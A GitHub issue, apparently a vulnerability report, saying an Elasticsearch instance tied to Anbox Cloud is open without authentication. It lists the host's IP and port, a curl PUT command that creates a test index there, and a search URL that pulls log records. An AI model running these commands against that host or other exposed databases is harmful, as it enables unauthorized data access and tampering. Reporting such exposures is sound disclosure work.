Skip to content

Elasticsearch instance unprotected, thus allowing an attacker to perform write/read operations on the database anbox cloud #363

@shadihh9

Description

@shadihh9

i found bug Elasticsearch instance unprotected, thus allowing an
attacker to perform write/read operations on the database
anbox cloud
step to create
1- i use for exploit bug and create poc in db by used in linux os

curl -XPUT 'http://40.68.164.154:9200/poc3' and see create poc in db
http://40.68.164.154:9200/poc3
and go to http://40.68.164.154:9200/.ds-logs-generic-default-2024.08.26-000006/_search?size=1000 and see https://contracts.canonical.com/v1/resources?architecture=amd64&kernel=6.5.0-1017-azure&series=jammy&virt=microsoft and after go to this url and see anbox-cloud which used azure cloud provider

thus allowing an attacker to perform write/read operations on the
attacker to perform write/read operations on the database
anbox cloud

Image Image Image Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions